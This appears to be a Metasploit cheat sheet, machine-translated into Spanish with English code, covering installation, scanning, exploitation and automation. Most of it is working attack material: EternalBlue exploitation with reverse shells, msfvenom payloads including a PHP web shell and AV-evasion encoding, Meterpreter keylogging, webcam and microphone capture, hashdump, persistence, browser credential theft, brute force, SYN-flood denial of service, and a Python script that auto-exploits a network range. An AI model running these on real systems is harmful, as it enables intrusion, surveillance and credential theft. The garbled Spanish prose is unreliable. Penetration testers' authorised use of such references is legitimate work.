Metasploit
Metasploit Cheat Sheet
__HTML_TAG_21_ Todos los comandos
Overview¶
Metasploit es el marco de pruebas de penetración más utilizado del mundo, proporcionando una plataforma integral para desarrollar, probar y ejecutar código de explotación contra sistemas de objetivos remotos. Creado originalmente por H.D. Moore y ahora mantenido por Rapid7, Metasploit se ha convertido en el estándar de facto para la evaluación de la penetración y la vulnerabilidad, ofreciendo una amplia colección de exploits, payloads, encoders y módulos auxiliares que permiten a los profesionales de seguridad identificar, validar y demostrar vulnerabilidades de seguridad en diversos entornos informáticos. La arquitectura modular del marco y la extensa base de datos de explotaciones conocidas lo convierten en una herramienta indispensable para hackers éticos, investigadores de seguridad y testadores de penetración en todo el mundo.
La fuerza básica de Metasploit radica en su capacidad integral de desarrollo y despliegue de hazañas, combinando un amplio repositorio de explotaciones probadas con sofisticados mecanismos de generación y entrega de carga útil. El marco incluye miles de explotaciones dirigidas a diversos sistemas operativos, aplicaciones y servicios de red, junto con cientos de cargas de pago que van desde cáscaras de comando simples hasta mecanismos avanzados de acceso persistente. Las capacidades inteligentes de detección y selección de objetivos de Metasploit permiten flujos de trabajo automatizados de evaluación de la vulnerabilidad, mientras que sus técnicas avanzadas de evasión y opciones de codificación ayudan a evitar controles de seguridad modernos y sistemas antivirus.
Las características empresariales de Metasploit incluyen capacidades de prueba distribuidas, herramientas integrales de presentación de informes y documentación, integración con escáneres de vulnerabilidad y sistemas de información de seguridad, y amplias opciones de personalización para escenarios de pruebas especializados. El marco soporta múltiples interfaces incluyendo el acceso a línea de comandos, basado en web y API, permitiendo la integración con tuberías automatizadas de pruebas de seguridad y herramientas de seguridad personalizadas. Con su comunidad de desarrollo activo, actualizaciones regulares que incorporan las últimas vulnerabilidades y explotaciones, y historial comprobado en evaluaciones de seguridad profesional, Metasploit sigue siendo el marco básico para las pruebas de penetración y validación de seguridad en todas las organizaciones de todos los tamaños.
Instalación¶
Ubuntu/Debian Instalación¶
Instalar Metasploit en los sistemas Ubuntu/Debian:
# Update system packages
sudo apt update && sudo apt upgrade -y
# Install dependencies
sudo apt install -y curl wget gnupg2 software-properties-common
# Add Rapid7 repository
curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall
chmod 755 msfinstall
sudo ./msfinstall
# Alternative: Install from package
wget https://downloads.metasploit.com/data/releases/metasploit-latest-linux-x64-installer.run
chmod +x metasploit-latest-linux-x64-installer.run
sudo ./metasploit-latest-linux-x64-installer.run
# Install from source (development version)
sudo apt install -y git ruby ruby-dev build-essential zlib1g-dev \
libreadline-dev libssl-dev libpq-dev sqlite3 libsqlite3-dev \
libpcap-dev autoconf postgresql postgresql-contrib
# Clone repository
git clone https://github.com/rapid7/metasploit-framework.git
cd metasploit-framework
# Install Ruby dependencies
gem install bundler
bundle install
# Initialize database
sudo systemctl start postgresql
sudo systemctl enable postgresql
sudo -u postgres createuser -s msf
sudo -u postgres createdb msf_database
# Configure database
cat > config/database.yml << 'EOF'
production:
adapter: postgresql
database: msf_database
username: msf
password:
host: localhost
port: 5432
pool: 5
timeout: 5
EOF
# Initialize Metasploit database
./msfconsole -q -x "db_status; exit"
# Verify installation
msfconsole --version
CentOS/RHEL Instalación¶
# Install EPEL repository
sudo yum install -y epel-release
# Install dependencies
sudo yum install -y curl wget git ruby ruby-devel gcc gcc-c++ \
make autoconf readline-devel openssl-devel zlib-devel \
postgresql postgresql-server postgresql-contrib
# Initialize PostgreSQL
sudo postgresql-setup initdb
sudo systemctl start postgresql
sudo systemctl enable postgresql
# Install Metasploit
curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall
chmod 755 msfinstall
sudo ./msfinstall
# Configure database
sudo -u postgres createuser -s msf
sudo -u postgres createdb msf_database
# Verify installation
msfconsole --version
macOS Instalación¶
# Install using Homebrew
brew install metasploit
# Install dependencies
brew install postgresql
brew services start postgresql
# Create database
createuser -s msf
createdb msf_database
# Alternative: Install from installer
# Download from https://www.metasploit.com/download
# Run installer package
# Verify installation
msfconsole --version
Instalación de Windows¶
# Download Windows installer
# https://www.metasploit.com/download
# Run installer as Administrator
# Follow installation wizard
# Install PostgreSQL
# Download from https://www.postgresql.org/download/windows/
# Configure database during installation
# Verify installation
# Open Command Prompt or PowerShell
msfconsole --version
# Alternative: Install with Chocolatey
choco install metasploit
# Configure Windows Defender exclusions
# Add Metasploit installation directory to exclusions
Docker Instalación¶
Running Metasploit in Docker:
# Pull official Metasploit image
docker pull metasploitframework/metasploit-framework
# Run Metasploit console
docker run --rm -it metasploitframework/metasploit-framework
# Run with persistent data
docker run --rm -it \
-v $(pwd)/msf_data:/home/msf/.msf4 \
metasploitframework/metasploit-framework
# Create custom Dockerfile
cat > Dockerfile.metasploit << 'EOF'
FROM metasploitframework/metasploit-framework
# Install additional tools
USER root
RUN apt-get update && apt-get install -y \
nmap \
nikto \
sqlmap \
&& rm -rf /var/lib/apt/lists/*
# Switch back to msf user
USER msf
# Set working directory
WORKDIR /home/msf
CMD ["msfconsole"]
EOF
# Build custom image
docker build -f Dockerfile.metasploit -t metasploit-custom .
# Run with network access
docker run --rm -it --net=host metasploit-custom
Uso básico¶
Metasploit Console¶
Empezar con msfconsole:
# Start Metasploit console
msfconsole
# Basic commands
help # Show help
version # Show version information
exit # Exit console
# Database commands
db_status # Check database connection
db_connect # Connect to database
db_disconnect # Disconnect from database
db_rebuild_cache # Rebuild module cache
# Workspace management
workspace # List workspaces
workspace -a test # Add workspace
workspace test # Switch to workspace
workspace -d test # Delete workspace
# Module management
show exploits # List all exploits
show payloads # List all payloads
show auxiliary # List auxiliary modules
show post # List post-exploitation modules
show encoders # List encoders
show nops # List NOP generators
# Search modules
search type:exploit platform:windows
search cve:2017
search ms17-010
search apache
Target Discovery¶
Descubrir y escanear objetivos:
# Network discovery with auxiliary modules
use auxiliary/scanner/discovery/arp_sweep
set RHOSTS 192.168.1.0/24
run
# Port scanning
use auxiliary/scanner/portscan/tcp
set RHOSTS 192.168.1.100
set PORTS 1-1000
run
# Service identification
use auxiliary/scanner/http/http_version
set RHOSTS 192.168.1.100
run
# SMB scanning
use auxiliary/scanner/smb/smb_version
set RHOSTS 192.168.1.0/24
run
# Database services
use auxiliary/scanner/mysql/mysql_version
set RHOSTS 192.168.1.100
run
# Web application scanning
use auxiliary/scanner/http/dir_scanner
set RHOSTS 192.168.1.100
set DICTIONARY /usr/share/wordlists/dirb/common.txt
run
# Vulnerability scanning
use auxiliary/scanner/smb/smb_ms17_010
set RHOSTS 192.168.1.0/24
run
# Save scan results
db_nmap -sS -O 192.168.1.0/24
hosts # View discovered hosts
services # View discovered services
vulns # View discovered vulnerabilities
Exploitation¶
Corriente de trabajo básica sobre explotación:
# Select exploit module
use exploit/windows/smb/ms17_010_eternalblue
show options # Display required options
show targets # Display available targets
show payloads # Display compatible payloads
# Configure exploit
set RHOSTS 192.168.1.100
set RPORT 445
set TARGET 0
# Select payload
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.1.50
set LPORT 4444
# Verify configuration
show options
check # Check if target is vulnerable
# Execute exploit
exploit
# or
run
# Alternative: Use exploit command directly
exploit -j # Run as job
exploit -z # Don't interact with session
# Session management
sessions # List active sessions
sessions -i 1 # Interact with session 1
sessions -k 1 # Kill session 1
sessions -K # Kill all sessions
Payload Generation¶
Generando cargas de pago independientes:
# Generate Windows executable
msfvenom -p windows/meterpreter/reverse_tcp \
LHOST=192.168.1.50 LPORT=4444 \
-f exe -o payload.exe
# Generate Linux executable
msfvenom -p linux/x86/meterpreter/reverse_tcp \
LHOST=192.168.1.50 LPORT=4444 \
-f elf -o payload.elf
# Generate PHP web shell
msfvenom -p php/meterpreter/reverse_tcp \
LHOST=192.168.1.50 LPORT=4444 \
-f raw -o shell.php
# Generate PowerShell payload
msfvenom -p windows/x64/meterpreter/reverse_tcp \
LHOST=192.168.1.50 LPORT=4444 \
-f psh -o payload.ps1
# Generate Android APK
msfvenom -p android/meterpreter/reverse_tcp \
LHOST=192.168.1.50 LPORT=4444 \
-o payload.apk
# Encoded payloads (AV evasion)
msfvenom -p windows/meterpreter/reverse_tcp \
LHOST=192.168.1.50 LPORT=4444 \
-e x86/shikata_ga_nai -i 3 \
-f exe -o encoded_payload.exe
# List available formats
msfvenom --list formats
# List available encoders
msfvenom --list encoders
# List available payloads
msfvenom --list payloads
Características avanzadas¶
Meterpreter¶
Uso avanzado de Meterpreter:
# Basic Meterpreter commands
sysinfo # System information
getuid # Current user
getpid # Current process ID
ps # Process list
pwd # Current directory
ls # List files
cd /path # Change directory
# File operations
download file.txt # Download file
upload file.txt # Upload file
edit file.txt # Edit file
cat file.txt # Display file content
rm file.txt # Delete file
mkdir newdir # Create directory
# System operations
shell # Drop to system shell
execute -f cmd.exe -i # Execute command interactively
migrate 1234 # Migrate to process ID 1234
kill 1234 # Kill process ID 1234
reboot # Reboot system
shutdown # Shutdown system
# Network operations
netstat # Network connections
route # Routing table
arp # ARP table
portfwd add -l 8080 -p 80 -r 192.168.1.100 # Port forwarding
# Privilege escalation
getsystem # Attempt privilege escalation
getprivs # Get current privileges
# Persistence
run persistence -X -i 10 -p 4444 -r 192.168.1.50
# Information gathering
hashdump # Dump password hashes
screenshot # Take screenshot
webcam_snap # Take webcam photo
record_mic # Record microphone
keyscan_start # Start keylogger
keyscan_dump # Dump keystrokes
keyscan_stop # Stop keylogger
# Registry operations (Windows)
reg queryval -k HKLM\\Software\\Microsoft\\Windows\\CurrentVersion -v ProductName
reg setval -k HKLM\\Software\\Test -v TestValue -t REG_SZ -d "Test Data"
reg deleteval -k HKLM\\Software\\Test -v TestValue
# Background session
background # Background current session
Post-Exploitation¶
Módulos posteriores a la explotación:
# Load post-exploitation module
use post/windows/gather/hashdump
set SESSION 1
run
# System information gathering
use post/windows/gather/enum_system
use post/linux/gather/enum_system
use post/osx/gather/enum_osx
# Network enumeration
use post/windows/gather/enum_domain
use post/windows/gather/enum_shares
use post/multi/gather/enum_network
# Credential harvesting
use post/windows/gather/credentials/windows_autologin
use post/windows/gather/smart_hashdump
use post/linux/gather/hashdump
# Privilege escalation
use post/windows/escalate/getsystem
use post/linux/escalate/cve_2021_4034
# Persistence mechanisms
use post/windows/manage/persistence_exe
use post/linux/manage/sshkey_persistence
# Data exfiltration
use post/windows/gather/enum_files
use post/multi/gather/firefox_creds
use post/multi/gather/chrome_cookies
# Lateral movement
use post/windows/gather/enum_domain_users
use post/windows/gather/enum_computers
Módulos auxiliares¶
Utilizando módulos auxiliares para diversas tareas:
# Brute force attacks
use auxiliary/scanner/ssh/ssh_login
set RHOSTS 192.168.1.100
set USER_FILE users.txt
set PASS_FILE passwords.txt
run
# FTP brute force
use auxiliary/scanner/ftp/ftp_login
set RHOSTS 192.168.1.100
set USERNAME admin
set PASS_FILE passwords.txt
run
# HTTP brute force
use auxiliary/scanner/http/http_login
set RHOSTS 192.168.1.100
set AUTH_URI /admin/login
set USERNAME admin
set PASS_FILE passwords.txt
run
# Database attacks
use auxiliary/scanner/mysql/mysql_login
use auxiliary/scanner/mssql/mssql_login
use auxiliary/scanner/postgres/postgres_login
# Denial of service
use auxiliary/dos/tcp/synflood
set RHOST 192.168.1.100
run
# Information gathering
use auxiliary/gather/shodan_search
set SHODAN_APIKEY your_api_key
set QUERY "apache"
run
# Fuzzing
use auxiliary/fuzzers/http/http_form_field
set RHOSTS 192.168.1.100
set URI /login.php
run
# SNMP enumeration
use auxiliary/scanner/snmp/snmp_enum
set RHOSTS 192.168.1.0/24
run
Módulos personalizados¶
Creando encargos Módulos Metasploit:
# Custom auxiliary module template
# Save as ~/.msf4/modules/auxiliary/scanner/custom/my_scanner.rb
require 'msf/core'
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::Tcp
include Msf::Auxiliary::Scanner
include Msf::Auxiliary::Report
def initialize(info = \\\\{\\\\})
super(update_info(info,
'Name' => 'Custom Scanner Module',
'Description' => 'Custom scanner for demonstration',
'Author' => ['Your Name'],
'License' => MSF_LICENSE,
'References' => [
['URL', 'http://example.com']
],
'DisclosureDate' => '2023-01-01'
))
register_options([
Opt::RPORT(80),
OptString.new('URI', [true, 'URI to scan', '/']),
OptString.new('KEYWORD', [true, 'Keyword to search for', 'admin'])
])
end
def run_host(target_host)
begin
connect
request = "GET #\\\\{datastore['URI']\\\\} HTTP/1.1\r\n"
request << "Host: #\\\\{target_host\\\\}\r\n"
request << "Connection: close\r\n\r\n"
sock.put(request)
response = sock.recv(1024)
if response.include?(datastore['KEYWORD'])
print_good("#\\\\{target_host\\\\}:#\\\\{rport\\\\} - Found keyword: #\\\\{datastore['KEYWORD']\\\\}")
report_note(
host: target_host,
port: rport,
proto: 'tcp',
type: 'custom_scan',
data: "Keyword '#\\\\{datastore['KEYWORD']\\\\}' found"
)
else
print_status("#\\\\{target_host\\\\}:#\\\\{rport\\\\} - Keyword not found")
end
rescue ::Exception => e
print_error("#\\\\{target_host\\\\}:#\\\\{rport\\\\} - Error: #\\\\{e.message\\\\}")
ensure
disconnect
end
end
end
# Custom exploit module template
# Save as ~/.msf4/modules/exploits/custom/my_exploit.rb
require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::Tcp
def initialize(info = \\\\{\\\\})
super(update_info(info,
'Name' => 'Custom Exploit Module',
'Description' => 'Custom exploit for demonstration',
'Author' => ['Your Name'],
'License' => MSF_LICENSE,
'References' => [
['CVE', '2023-0001'],
['URL', 'http://example.com']
],
'Platform' => 'linux',
'Targets' => [
['Linux x86', \\\\{ 'Ret' => 0x08048484 \\\\}]
],
'Payload' => \\\\{
'Space' => 400,
'BadChars' => "\x00\x0a\x0d\x20"
\\\\},
'DisclosureDate' => '2023-01-01',
'DefaultTarget' => 0
))
register_options([
Opt::RPORT(9999),
OptString.new('COMMAND', [true, 'Command to execute', 'id'])
])
end
def check
begin
connect
sock.put("TEST\n")
response = sock.recv(1024)
disconnect
if response.include?("VULNERABLE")
return Exploit::CheckCode::Vulnerable
else
return Exploit::CheckCode::Safe
end
rescue
return Exploit::CheckCode::Unknown
end
end
def exploit
begin
connect
buffer = "A" * 260
buffer << [target.ret].pack('V')
buffer << payload.encoded
print_status("Sending exploit buffer...")
sock.put(buffer)
handler
disconnect
rescue ::Exception => e
print_error("Exploit failed: #\\\\{e.message\\\\}")
end
end
end
Automation Scripts¶
Automated Penetration Testing Script¶
#!/usr/bin/env python3
# Automated penetration testing with Metasploit
import subprocess
import json
import time
import sys
import os
import argparse
from datetime import datetime
class MetasploitAutomator:
def __init__(self, msf_path="msfconsole"):
self.msf_path = msf_path
self.workspace = f"auto_test_\\\\{int(time.time())\\\\}"
self.results = \\\\{\\\\}
def execute_msf_command(self, commands, timeout=300):
"""Execute Metasploit commands"""
if isinstance(commands, str):
commands = [commands]
# Create resource file
resource_file = f"/tmp/msf_commands_\\\\{int(time.time())\\\\}.rc"
with open(resource_file, 'w') as f:
for cmd in commands:
f.write(f"\\\\{cmd\\\\}\n")
f.write("exit\n")
try:
# Execute Metasploit with resource file
result = subprocess.run([
self.msf_path, "-q", "-r", resource_file
], capture_output=True, text=True, timeout=timeout)
# Clean up
os.remove(resource_file)
return result.stdout, result.stderr, result.returncode
except subprocess.TimeoutExpired:
print(f"Command timed out after \\\\{timeout\\\\} seconds")
return "", "Timeout", 1
except Exception as e:
print(f"Error executing command: \\\\{e\\\\}")
return "", str(e), 1
def setup_workspace(self):
"""Setup Metasploit workspace"""
commands = [
"db_status",
f"workspace -a \\\\{self.workspace\\\\}",
f"workspace \\\\{self.workspace\\\\}"
]
stdout, stderr, returncode = self.execute_msf_command(commands)
if returncode == 0:
print(f"Workspace '\\\\{self.workspace\\\\}' created successfully")
return True
else:
print(f"Failed to create workspace: \\\\{stderr\\\\}")
return False
def network_discovery(self, target_range):
"""Perform network discovery"""
print(f"Starting network discovery for \\\\{target_range\\\\}")
commands = [
f"workspace \\\\{self.workspace\\\\}",
f"db_nmap -sn \\\\{target_range\\\\}",
"hosts -c address,name,os_name,purpose",
"services -c port,proto,name,state"
]
stdout, stderr, returncode = self.execute_msf_command(commands, timeout=600)
if returncode == 0:
print("Network discovery completed")
self.results['discovery'] = stdout
return True
else:
print(f"Network discovery failed: \\\\{stderr\\\\}")
return False
def vulnerability_scan(self, targets):
"""Perform vulnerability scanning"""
print(f"Starting vulnerability scan for \\\\{targets\\\\}")
scan_modules = [
"auxiliary/scanner/smb/smb_ms17_010",
"auxiliary/scanner/http/http_version",
"auxiliary/scanner/ssh/ssh_version",
"auxiliary/scanner/ftp/ftp_version",
"auxiliary/scanner/mysql/mysql_version"
]
commands = [f"workspace \\\\{self.workspace\\\\}"]
for module in scan_modules:
commands.extend([
f"use \\\\{module\\\\}",
f"set RHOSTS \\\\{targets\\\\}",
"run",
"back"
])
commands.append("vulns")
stdout, stderr, returncode = self.execute_msf_command(commands, timeout=1200)
if returncode == 0:
print("Vulnerability scan completed")
self.results['vulnerabilities'] = stdout
return True
else:
print(f"Vulnerability scan failed: \\\\{stderr\\\\}")
return False
def automated_exploitation(self, targets):
"""Perform automated exploitation"""
print(f"Starting automated exploitation for \\\\{targets\\\\}")
# Common exploits to try
exploits = [
\\\\{
'module': 'exploit/windows/smb/ms17_010_eternalblue',
'payload': 'windows/x64/meterpreter/reverse_tcp',
'port': 445
\\\\},
\\\\{
'module': 'exploit/linux/ssh/ssh_login',
'payload': 'linux/x86/meterpreter/reverse_tcp',
'port': 22
\\\\},
\\\\{
'module': 'exploit/multi/http/apache_struts2_content_type_ognl',
'payload': 'linux/x86/meterpreter/reverse_tcp',
'port': 80
\\\\}
]
successful_exploits = []
for exploit in exploits:
commands = [
f"workspace \\\\{self.workspace\\\\}",
f"use \\\\{exploit['module']\\\\}",
f"set RHOSTS \\\\{targets\\\\}",
f"set RPORT \\\\{exploit['port']\\\\}",
f"set PAYLOAD \\\\{exploit['payload']\\\\}",
"set LHOST 0.0.0.0", # Auto-detect
"set LPORT 4444",
"check",
"exploit -j", # Run as job
"sleep 10",
"sessions -l"
]
stdout, stderr, returncode = self.execute_msf_command(commands, timeout=300)
if "session" in stdout.lower() and "opened" in stdout.lower():
print(f"Successful exploitation with \\\\{exploit['module']\\\\}")
successful_exploits.append(exploit)
else:
print(f"Exploitation failed with \\\\{exploit['module']\\\\}")
self.results['exploits'] = successful_exploits
return len(successful_exploits) > 0
def post_exploitation(self):
"""Perform post-exploitation activities"""
print("Starting post-exploitation activities")
commands = [
f"workspace \\\\{self.workspace\\\\}",
"sessions -l",
"sessions -i 1", # Interact with first session
"sysinfo",
"getuid",
"ps",
"hashdump",
"background"
]
stdout, stderr, returncode = self.execute_msf_command(commands, timeout=300)
if returncode == 0:
print("Post-exploitation completed")
self.results['post_exploitation'] = stdout
return True
else:
print(f"Post-exploitation failed: \\\\{stderr\\\\}")
return False
def generate_report(self, output_file="metasploit_report.html"):
"""Generate comprehensive report"""
html_content = f"""
<!DOCTYPE html>
<html>
<head>
<title>Metasploit Automated Penetration Test Report</title>
<style>
body \\\\{\\\\{ font-family: Arial, sans-serif; margin: 20px; \\\\}\\\\}
.section \\\\{\\\\{ margin: 20px 0; padding: 15px; border: 1px solid #ddd; \\\\}\\\\}
.critical \\\\{\\\\{ color: red; font-weight: bold; \\\\}\\\\}
.warning \\\\{\\\\{ color: orange; font-weight: bold; \\\\}\\\\}
.info \\\\{\\\\{ color: blue; \\\\}\\\\}
.success \\\\{\\\\{ color: green; font-weight: bold; \\\\}\\\\}
table \\\\{\\\\{ border-collapse: collapse; width: 100%; \\\\}\\\\}
th, td \\\\{\\\\{ border: 1px solid #ddd; padding: 8px; text-align: left; \\\\}\\\\}
th \\\\{\\\\{ background-color: #f2f2f2; \\\\}\\\\}
pre \\\\{\\\\{ background: #f5f5f5; padding: 10px; overflow-x: auto; \\\\}\\\\}
</style>
</head>
<body>
<h1>Metasploit Automated Penetration Test Report</h1>
<p>Generated: \\\\{datetime.now().isoformat()\\\\}</p>
<p>Workspace: \\\\{self.workspace\\\\}</p>
<div class="section">
<h2>Executive Summary</h2>
<ul>
<li>Successful Exploits: \\\\{len(self.results.get('exploits', []))\\\\}</li>
<li>Vulnerabilities Found: \\\\{self.count_vulnerabilities()\\\\}</li>
<li>Hosts Discovered: \\\\{self.count_hosts()\\\\}</li>
</ul>
</div>
<div class="section">
<h2>Network Discovery Results</h2>
<pre>\\\\{self.results.get('discovery', 'No discovery data available')\\\\}</pre>
</div>
<div class="section">
<h2 class="critical">Successful Exploits</h2>
<table>
<tr><th>Module</th><th>Payload</th><th>Port</th></tr>
"""
for exploit in self.results.get('exploits', []):
html_content += f"""
<tr>
<td>\\\\{exploit['module']\\\\}</td>
<td>\\\\{exploit['payload']\\\\}</td>
<td>\\\\{exploit['port']\\\\}</td>
</tr>"""
html_content += """
</table>
</div>
<div class="section">
<h2>Vulnerability Scan Results</h2>
<pre>\\\\{\\\\}</pre>
</div>
<div class="section">
<h2>Post-Exploitation Results</h2>
<pre>\\\\{\\\\}</pre>
</div>
<div class="section">
<h2>Recommendations</h2>
<ul>
<li>Patch all identified vulnerabilities immediately</li>
<li>Implement network segmentation</li>
<li>Deploy endpoint detection and response (EDR) solutions</li>
<li>Conduct regular security assessments</li>
<li>Implement multi-factor authentication</li>
<li>Monitor network traffic for suspicious activities</li>
</ul>
</div>
</body>
</html>
""".format(
self.results.get('vulnerabilities', 'No vulnerability data available'),
self.results.get('post_exploitation', 'No post-exploitation data available')
)
with open(output_file, 'w') as f:
f.write(html_content)
print(f"Report generated: \\\\{output_file\\\\}")
return output_file
def count_vulnerabilities(self):
"""Count vulnerabilities from scan results"""
vuln_data = self.results.get('vulnerabilities', '')
return vuln_data.count('Vulnerable') + vuln_data.count('VULNERABLE')
def count_hosts(self):
"""Count discovered hosts"""
discovery_data = self.results.get('discovery', '')
return discovery_data.count('address')
def cleanup(self):
"""Clean up workspace and sessions"""
commands = [
"sessions -K", # Kill all sessions
f"workspace -d \\\\{self.workspace\\\\}"
]
self.execute_msf_command(commands)
print("Cleanup completed")
def run_full_assessment(self, target_range, output_dir="/tmp/metasploit_assessment"):
"""Run complete automated assessment"""
print("Starting automated Metasploit assessment...")
# Create output directory
os.makedirs(output_dir, exist_ok=True)
try:
# Setup workspace
if not self.setup_workspace():
return False
# Network discovery
if not self.network_discovery(target_range):
return False
# Vulnerability scanning
if not self.vulnerability_scan(target_range):
return False
# Automated exploitation
self.automated_exploitation(target_range)
# Post-exploitation
self.post_exploitation()
# Generate report
report_file = os.path.join(output_dir, "metasploit_report.html")
self.generate_report(report_file)
print("Automated assessment completed successfully")
return True
except Exception as e:
print(f"Assessment failed: \\\\{e\\\\}")
return False
finally:
self.cleanup()
def main():
parser = argparse.ArgumentParser(description='Metasploit Automation')
parser.add_argument('--target', required=True, help='Target range (e.g., 192.168.1.0/24)')
parser.add_argument('--output', default='/tmp/metasploit_assessment', help='Output directory')
parser.add_argument('--msf-path', default='msfconsole', help='Path to msfconsole')
args = parser.parse_args()
# Initialize automator
automator = MetasploitAutomator(args.msf_path)
# Run assessment
success = automator.run_full_assessment(args.target, args.output)
if success:
print("Assessment completed successfully")
else:
print("Assessment failed")
sys.exit(1)
if __name__ == "__main__":
main()
Integración Ejemplos¶
CI/CD Integration¶
# Jenkins Pipeline for Metasploit Integration
pipeline \\\\{
agent \\\\{
label 'security-testing'
\\\\}
environment \\\\{
MSF_DATABASE_URL = 'postgresql://msf:password@localhost/msf_database'
TARGET_NETWORK = '192.168.100.0/24'
\\\\}
stages \\\\{
stage('Setup Environment') \\\\{
steps \\\\{
script \\\\{
// Start PostgreSQL and initialize Metasploit
sh '''
sudo systemctl start postgresql
msfdb init
msfconsole -q -x "db_status; exit"
'''
\\\\}
\\\\}
\\\\}
stage('Network Discovery') \\\\{
steps \\\\{
script \\\\{
// Perform network discovery
sh '''
cat > discovery.rc << 'EOF'
workspace -a jenkins_test
db_nmap -sn $\\\\{TARGET_NETWORK\\\\}
hosts -o hosts.xml
exit
EOF
msfconsole -q -r discovery.rc
'''
\\\\}
\\\\}
\\\\}
stage('Vulnerability Assessment') \\\\{
steps \\\\{
script \\\\{
// Run vulnerability scans
sh '''
cat > vuln_scan.rc << 'EOF'
workspace jenkins_test
use auxiliary/scanner/smb/smb_ms17_010
set RHOSTS $\\\\{TARGET_NETWORK\\\\}
run
vulns -o vulns.xml
exit
EOF
msfconsole -q -r vuln_scan.rc
'''
\\\\}
\\\\}
\\\\}
stage('Generate Report') \\\\{
steps \\\\{
script \\\\{
// Generate security report
sh '''
python3 generate_msf_report.py \
--hosts hosts.xml \
--vulns vulns.xml \
--output security_report.html
'''
\\\\}
\\\\}
\\\\}
\\\\}
post \\\\{
always \\\\{
// Archive results
archiveArtifacts artifacts: '*.xml,*.html', fingerprint: true
// Publish report
publishHTML([
allowMissing: false,
alwaysLinkToLastBuild: true,
keepAll: true,
reportDir: '.',
reportFiles: 'security_report.html',
reportName: 'Security Assessment Report'
])
// Clean up
sh '''
msfconsole -q -x "workspace -d jenkins_test; exit"
rm -f *.rc *.xml
'''
\\\\}
failure \\\\{
// Send notification
emailext (
subject: "Security Assessment Failed: $\\\\{env.JOB_NAME\\\\} - $\\\\{env.BUILD_NUMBER\\\\}",
body: "Security assessment failed. Check console output for details.",
to: "$\\\\{env.SECURITY_TEAM_EMAIL\\\\}"
)
\\\\}
\\\\}
\\\\}
Troubleshooting¶
Common Issues¶
** Problemas de conexión de datos:**
# Check database status
msfconsole -q -x "db_status; exit"
# Reinitialize database
msfdb delete
msfdb init
# Manual database setup
sudo -u postgres createuser -s msf
sudo -u postgres createdb msf_database
# Configure database connection
cat > ~/.msf4/database.yml << 'EOF'
production:
adapter: postgresql
database: msf_database
username: msf
password:
host: localhost
port: 5432
pool: 5
timeout: 5
EOF
Prontos problemas de carga:
# Reload modules
msfconsole -q -x "reload_all; exit"
# Check module paths
msfconsole -q -x "show advanced; exit"|grep ModulePath
# Update Metasploit
msfupdate
# Clear module cache
rm -rf ~/.msf4/store/modules_metadata.json
** Problemas de generación de carga:**
# Check available encoders
msfvenom --list encoders
# Test payload generation
msfvenom -p windows/meterpreter/reverse_tcp \
LHOST=127.0.0.1 LPORT=4444 \
-f exe --platform windows -a x86 \
-o test_payload.exe
# Debug payload issues
msfvenom -p windows/meterpreter/reverse_tcp \
LHOST=127.0.0.1 LPORT=4444 \
-f raw|hexdump -C
Performance Optimization¶
Optimización del rendimiento de Metasploit:
# Database optimization
# Edit postgresql.conf
sudo nano /etc/postgresql/*/main/postgresql.conf
# Increase shared_buffers
shared_buffers = 256MB
# Increase work_mem
work_mem = 4MB
# Restart PostgreSQL
sudo systemctl restart postgresql
# Metasploit optimization
# Increase Ruby memory limit
export RUBY_HEAP_MIN_SLOTS=800000
export RUBY_HEAP_SLOTS_INCREMENT=300000
export RUBY_HEAP_SLOTS_GROWTH_FACTOR=1
export RUBY_GC_MALLOC_LIMIT=79000000
# Start Metasploit with optimizations
msfconsole
Security Considerations¶
Operational Security¶
Uso legal y ético: - Únicamente utilice Metasploit contra sistemas que posee o tenga permiso explícito para probar - Comprender los requisitos legales para las pruebas de penetración en su jurisdicción - Aplicar procedimientos adecuados de autorización y documentación - Respetar las limitaciones de alcance y las normas de compromiso - Mantener la confidencialidad de las vulnerabilidades descubiertas
Protección de datos** - Encrypt Metasploit databases containing sensitive information - Aplicar políticas de retención de datos seguras para los resultados de las evaluaciones - Acceso a herramientas y resultados de explotación - Transmisión segura de los informes y conclusiones de las evaluaciones - Limpieza regular de archivos temporales y datos de sesión
Consideraciones defensivas¶
Detección y prevención - Monitor for Metasploit signatures and indicators of compromise - Implementar sistemas de detección de intrusiones en red - Implementar soluciones de detección y respuesta de puntos finales - Evaluaciones periódicas de seguridad y gestión de la vulnerabilidad - Capacitación en materia de seguridad para equipos de desarrollo y operaciones
Referencias¶
- [Metasploit Official Documentation](URL_26__
- [Metasploit GitHub Repository](URL_27__
- [Metasploit Unleashed Course](URL_28__
- Rapid7 Vulnerability Database_
- [Guía de Pruebas de la OPEP](URL_30_